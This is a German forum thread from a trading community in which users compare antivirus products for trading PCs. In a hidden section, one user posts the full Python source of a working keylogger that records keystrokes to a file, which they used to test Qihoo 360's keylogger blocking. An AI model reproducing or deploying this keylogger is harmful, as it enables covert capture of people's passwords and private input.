Skip to content
View in the app

A better way to browse. Learn more.

Tom Next - Trading Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Welchen Virenscanner nutzt ihr ?

Da mich die Tage ein recht böser Virus erreicht hat (ja ich weiß, was machen Nichtprogrammierer auf Hacker Sites) laugh.png

würde mich interessieren was ihr für "gut" erachtet.

 

Ich hatte bisher Norton im Einsatz, habe ich entfernt, müllt imho irgendwie alles zu.

Danach hatte ich Kaspersky, war eigentlich zufrieden, aber nach dem letzten Virus bin ich wieder am suchen.

 

Habt ihr Empfehlungen ? door.gif

(Außer mein Genbedingtes und somit angeborenes Surfverhalten zu ändern....)

Bitte auch keinen Betriebssystemwechsel, bin froh bei Windows den Rechtsklick der Maus nach einiger Übung jetzt schon blind bedienen zu können.

Featured Replies

Welches Antivirus nutzt Ihr auf eurem (auto) Tradingrechner?

Hab Folgendes versucht...

Comodo
Arbeitet leider nicht gut mit Multicharts zusammen. Man muss ständig ein FIX einspielen bei jedem neuen Update.

Avira
Positiv: Der Virenpool updatet sich jeden Tag
Negativ: Gefühlsmäßig updatet sich die Version von Avira jede zweite Woche und erfordert einen Neustart des Rechners. Ich hänge oft wochenlang mit einem Popupfenster rum dass alle 4 Stunden einen auffordert den Rechner neu zu starten und bin mir nicht mal sicher ob in der Zeit der Rechner geschützt ist.

Flat ist man doch eigentlich nie (nur wenn der Filter einspringt und das dauert).


Kaspersky
Zu CPU hungrig

Welchen Antivirus nutzt Ihr? Am besten eine die den Virenpool täglich updatet ABER beim update von der Version keinen Neustart erfordert.

Aus diesem Thread habe ich folgende gelesen
- Nod32
- ESET
- G-Data

Können die Leute die diese SW nutzen folgende Punkte beantworten?
- Automatisches Virenupdate? Wenn ja in welchen Intervallen?
- Versionsupdate ohne Neustart des Rechners?
- CPU hungrig oder schonend
- Kosten oder Free? Bei Kosten wie hoch pro Lizenz.

Anforderung: Ab und zu surfen auf ehr sicheren Seiten. Ich versuch diesen Rechner nicht anzufassen. Entsprechend muss es keiner sein der aus dem Rechner ein Tresor macht.

System ist ein stromsparender Rechner der 24/7 läuft und gerade mal so seine Aufgaben mit Fernsteuerung, Backups, Portfoliotrading und ein paar Charts bewältigen kann. Deswegen ist die CPU Last vom Antivirus wichtig.

Ich nutze Avast, ist kostenlos und sehr ressourcenschonend.

Gibt tägliche Updates, merkst Du aber nix von, kein Restart erforderlich.

Antivir findet bestimmt mehr als Avast, hat mir aber ständig den Browser blockiert und genervt.

Kritische Seiten besuche ich mit Sandboxie, da haben die Viren mehr Platz und können sich austoben.

Alle paar Wochen ein Scan mit Antimalware, das wars.

Also ich habe norton gekauft. Gerade aufgespielt ging nicht anders da ich vom "abuseteam" der Telekom freundlich Post bekommen hatte das mein

Rechner feindliche Signaturen aussendet. Hatte bis dato Antivir(Avirafree), Cleaner , Malwarebytes und sogar ein freies Troyanerbrogramm auf den Rechnern.Dazu noch das MRT-Programm von Windows genutzt. War zu geizig und wollte auch nicht Ressourcen verschleudern.

Hat immerhin 11 Jahre geklappt.

Der Virus wurde mir aber nicht angezeigt trotzmehrmaliger Suche.

Habe 50 € ausgegben für 5 Rechner bei medimaxx. Gibs im Netz aber billiger. Wollte aber die Schachtel ; ).

Fazit.

So genau wie du das wissen willst kann ich das jetzt aber auch beantworten.Habe ihn mir so genau auch noch nicht angesehen.

Aber er verrichtet seine Arbeit und ich merke ihn nicht. Besser als Antivir.

Eigentlich kostet jeder Virenscanner Geschwindigkeit.Hatte Norton wiegesagt vor 11 Jahren. Damals war er zu grottig.

Deswegen kam ich auf die Idee mehrere Programme zu kombinieren die sich vertrugen und nicht soviel Rechnerleistung schlucken.

Er ist besser geworden und unauffälliger. Von den Updates merke ich nichts.Neustart sowieso nicht.

Das soll jetzt keine Werbung sein. Habe nicht lange überlegt sondern aus Gewohnheit gekauft.Würde es wieder tun.

Auch bei meinem großen Rechner war ein Troyaner Genric versteckt.

Gut ist das horstmäßig das das überhaupt passiert ist aber sei es drum. Meine Bankgeschäfte und Einkäufe mache ich eh von einem anderen Rechner.

Der Norton läuft sogar bei dem Uralt Rechner meiner Schwester mit 1.75 GB Ram.

Allerdings wenn du selbst einen großen Systemscan startest, merkst du schon das er bremst.

Aber so ohne Waffen im Netz sollte ja auch nicht sein.

 

P.S. Komischerweise zeigte keiner meiner freien Programme was an. Was schon seltsam erschien weil irgendwas hat sich ja immer eingeschlichen mit der Zeit.Und wenn es nur Traching cookies sind.

Die haben sich wahrscheinlich alle abgesprochen oder die Viren sind gefährlicher geworden.

 

Also auf freie Virenscanner Anbieter werde ich wohl in Zukunft verzichten müssen.

 

Kannst ihn Dir ja mal ansehen.blush.gif

Bei mir startet der Process Explorer statt der TaskManager mit dem Windowsstart.

Dort werden alle Prozesse automatisch in realtime mit VirusTotal überprüft. Steht dann immer 2/56 Funde – heisst soviel wie 2 Virenscanner von 56 hat was verdächtiges gemeldet (rechte Seite im Bild vom normalen Rechner nicht der Tradingrechner). Wenn man wissen will was die beiden an meckern kann man durch drauf klicken das bekommen ----> 2/56

 

VirusTotal.png

 

Es ist aber kein Virenscanner der in festen Intervalle die HDD untersucht und es ist kein „vollwertiger“ Ersatz.

Norton bin ich damals auf Abstand gegangen da auf ein CCC Seminar Norton als Angriffsziel genommen wurde - den Kiddies wurde beigebracht wie man dies mit Leichtigkeit abschießt.

 

Avast werde ich mir anschauen.

Ja gut, dann muß ich neidlos anerkennen das Du Dich in diesen Bereich wesentlich besser auskennst als ich. Für meine Zwecke reicht er. Wenn ich in Zukunft Fragen haben sollte, wende ich mich dann an Dich! pelo1.gif

hab mittlerweile fast alle durch, Bitdefender ist seit nunmehr zwei Jahren meine Nr.1

sehr ressourcenschonend, und überdurchschnittliche Erkennungsrate...

Norton war mein Negativbeispiel bei der Systemlast, ebenso Eset;

 

bestätigen auch Tests:

http://www.av-test.org/de/news/news-single-view/windows-7-die-besten-security-pakete-zum-ende-des-mainstream-supports/

 

 

http://www.av-test.org/typo3temp/_processed_/csm_0115_win7_test_Consumer_Gesamt_de_0c6e15394b.png

 

 

ein Problem hab ich allerdings momentan mit MT5 und Myfxbook, er lässt mich die Acc. Datei von Myfxbook nicht installieren.

MT4 ohne Probleme

allerdings kennen die Leute von Myfxbook das Problem und arbeiten dran...

@axe

Verlangt Bitdefender einen Neustart des Rechners nach einem Versionsupdate? Wie oft passiert dies?

 

EDIT:

Googled man den ersten Kostenlosen (Qihoo) so liest man durchwegs positives. Den kannte ich noch nicht Ich werde den mal installieren.

Danke axe für die informative Seite.

Qihoo erster Eindruck
Installiert und es gibt ein One click scan. Erfindet auch etwas – schon eigenartig da Process Explorer incl. TotalVirus nichts findet also weiter – Ahhh es waren nur Windows Einstellungen die er moniert. Also die verschiedenen Punkte durch gegangen und klingt alles ganz logisch also zulassen.

Nun löscht er einige GB an junk files.
Hmm er will nun sämtliche MC dll Dateien für Analysezwecke hochladen???? Verbieten... ich vertraue MC.
Systemlast --- ehr gering.

→ Ach NEIN Er will einen Neustart – er zwingt ihn aber nicht wie Avira. Er empfielt nur einen – hmm also noch i.O.

Also Qihoo macht einen sehr guten ersten Eindruck. Will man einen Chinaprodukt als Security Kit auf dem Rechner laufen lassen? Schaut man auf http://map.ipviking.com/ (Angriffe im Netz in realtime) so sieht man dass die meisten Angriffe von China kommen.
Ich lasse mich aber von meinen ersten Eindruck und den durchweg positiven Reviews im Internet überzeugen und gebe dieser SW eine Chance.
Damit sollte China meine Passwörter nun auch haben ;-)

Was bietet Qihoo
- Full Check
One Click bestehend aus
Speedup
Virus Scan
Cleanup
WiFi Security Check
- Virus Scan (Details)
- Speedup (Details)
- Cleanup (Details)
- Protection (Details)

Bei Details hat man mehr Auswahl als die One Click Option.

Es bietet weiterhin
- Privacy Protection
Webcam Protection
Keylogger Blocking
- Internet Protection
Downloaded File Scan
Malicious Website Blocking
Online Shopping Protection
- System Protection
USB Drive Protection
Malicious Behavior Blocking
Registry Protection
Network Threat Blocking
File System Protection
Scan File When Saved

Es bietet 5 Engine an
1. 360 Cloud Scan Engine
2. System Repair Engine
3. QVMII AI Engine
4. Bitdefender Engine
5. Avira AntiVir Engine

Was die einzelnen Engine genau bedeuten – k.a. aber es klingt gut - Avira und Bitdefender Engine sowie eine AI sind dabei. Klingt wirklich gut. pumpkinsmile.gif

 

[hide]
Nun mein live test. Ich starte mal meinen homemade keylogger written in Python
Ergebnis: nicht erkannt. Also von wegen Keylogger Blocking. Leider Fehlanzeige.
Auf der anderen Seite erwarte ich auch nicht dass irgendein Security Suit selbstgeschriebene Python Programme aufhalten kann da sie ganz normale Windows interne Funktionen nutzt.

Falls jemand selbst mal mit Keylogger rumspielen will hier mal der primitivste Keylogger den man haben kann - Ausgabe in eine Datei.

 

import pyHook, pythoncom, sys, logging

#file_log='C:\\Windows\\Wpl.txt'
file_log='D:\\Projekte\\Python\\Keylogger\\Wpl.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
 

 

 

[/hide]

[hide]Also mit nem selbstgeschriebenen Virus den Virenscanner testen....Respekt! Ich glaube, wir lernen hier mehr von Dir als Du bei uns erfragst hast :-)

I'm not even mad - that's amazing![/hide]

  • 4 weeks later...

Thx für die detaillierte review.

 

Wurde der Neustart inzwischen erzwungen oder dauerhaft nur empfohlen?

Wenn du mich meinst mit Qihoo dann nur empfohlen. Keine weitere Aktion diesbezüglich Notwendig.

Auf der anderen Seite ging Avira mir da aber schon heftig auf die Eier. Die Prozesse sind nach dem wegdrücken nicht gekillt worden. Ich hatte laut Taskmanager seitenlange Prozesse laufen von Avira - alles wegen Neustart die ich weggedrückt habe.

 

Qihoo findet und meckert aber ständig rum wegen meinem backup software (syncbackfree). Die Avira engine scheint damit ein Problem zu haben. Dieses Problem ist bekannt und man arbeitet daran.

Qihoo nutzt ja ua. die Avira engine. Laut Totalvirus besteht aber kein Problem mit den anderen AntivirusSW.

Es ist mir lieber er findet etwas "mehr" als übersieht etwas somit noch alles im grünen Bereich.

Ich hab die Gelegenheit noch gar nicht genutzt um zu sagen, dass ich keinen benutze. mosking.gif

  • Author

ot.gif

Ich hab die Gelegenheit noch gar nicht genutzt um zu sagen, dass ich keinen benutze. mosking.gif

Du bist ja auch noch nicht in dem Alter, in dem Du gefährliche Seiten aufrufst oder gar Downloads tätigst. grin.gif

Schaut man auf http://map.ipviking.com/ (Angriffe im Netz in realtime) so sieht man dass die meisten Angriffe von China kommen.

Schaut mal im Link rein. Gerade JETZT ist ein massiver Angriff von D nach USA

Angriff.png

Bohh der Angriff ist voll im gange. Scheint aber irgendwie Ziellos zu sein. ZielIP ist klar aber die greifen alle Ports an und das ist doch ehr ungewöhnlich.

Ungewöhnlich ist auch der Ursprung.

Bei einem normalen Angriff variiert man den Ursprung damit man nicht gefunden wird und man greift nur einen Port an.

Hier verändert sich aber der Ursprung nicht und es sind alle Ports (in 1000 Schritte) betroffen.

Einen echten Sinn sehe ich gerade noch nicht darin - es sei den man will den Ursprung absichtlich "finden lassen".

Der Angriff ist nun vorbei....

Soweit ich mich erinnern kann bietet BSB einen Anonymizer Proxy an. Eines davon steht in der Nähe von Köln – worauf die IP auch hinweist.

Soweit ich weiß darf ein Proxy in D auch nicht vollständig anonymisieren und muss auf Anordnung die Logs auch ausgeben.

Das sind aber Sachen die ich vor Jahren mal gelesen habe und es könnte sich mittlerweile alles geändert haben.

Auf dem Mac (und MT4 auf einem VPS) bin ich verschont und benötige keine Virenscanner - zumindest bis jetzt noch nicht...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.